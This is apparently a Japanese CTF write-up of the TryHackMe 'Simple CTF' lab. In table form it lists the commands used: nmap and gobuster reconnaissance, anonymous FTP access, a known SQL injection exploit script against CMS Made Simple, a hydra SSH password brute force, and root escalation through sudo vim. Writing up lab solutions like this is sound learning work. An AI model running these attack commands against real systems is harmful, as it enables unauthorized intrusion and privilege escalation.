[THM:Simple CTF]にチャレンジ
以下、与えられた脆弱性のあるマシーンに対して、実行してみたフローと詳細の内容になります。このやり方ですべて解答することができました。
| ① | namp | nmap -p- -Pn -T4 -sV -sC <IP> | 21/tcp ftp vsftpd 3.0.3 80/tcp http Apache httpd 2.4.18 2222/tpc ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 |
| nmap –script vuln <IP> | いくつかcveが見つかる。 CVE-2011-1002 CVE-2007-6750 | ||
| ② | ブラウザ | http://<IP> | Apache2のデフォルトページが表示されている。 バージョン等は①で確認済み。 |
| ③ | ftp | ftp <IP> | anonymousでパスワード無しでログインできる。 pubディレクトリの中に、ForMitch.txtというファイルが存在。 ファイル名から、mitchというユーザーの存在を推測。 中には、「パスワードが簡単すぎる!システムユーザーのパスワードまで一緒なんて!」とコメントが |
| ④ | gobuster | obuster dir -u <IP> -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt | simpleといディレクトリが見つかる。 |
| ⑤ | ブラウザ | http://<IP>/simple | CMS Made simpleの、CMSを利用していることが判明。クリックによりログインページも見つかる。 CMSのバージョンは、2.2.8ということも目視できる。 |
| ⑥ | searchsploit | searchsploit cms made simple 2.2 | たくさんのエクスプリとコードが見つかる。いくつか実行。SQLiがうまくいった。 |
| python /usr/share/exploitdb/exploits/php/webapps/46635.py -u http://<IP>/simple | エクスプロイトコードを実行。以下の結果を獲得。 [+] Salt for password found: 1dac0d92e9fa6bb2 [+] Username found: mitch [+] Email found: admin@admin.com [+] Password found: 0c01f4468bd75d7a84c7eb73846e8d96 パスワードが2つ見つかっているが、どちらもSaltがかかっていて、johnでもhashcatでも解析不能。 john hash.txt –wordlist=/usr/share/wordlists/rockyou.txt hashcat hash.txt /usr/share/wordlists/rockyou.txt しかしユーザー名は判明。 | ||
| ⑦ | hydra | hydra -l mitch -P /usr/share/wordlists/rockyou.txt -s 2222 ssh://<IP> | これにより、sshのパスワードが判明した。 |
| ⑧ | ssh | ssh -p mitch@<IP> | mitchでログインができる。 |
| ⑨ | sudo | sudo -l | sudo権限が付与されているコマンドを確認。vimが見つかった。 |
sudo vim -c ':!/bin/sh' | GTFOBins をたよりに、権限昇格を実行。これで、/rootのディレクトリも見れるようになった。 |
個人的には、searchsploitからの cms made simple 、そしてそのexploitの実行の部分がなんだか、無理やり感を感じた。他にスマートな方法はないか気になる。
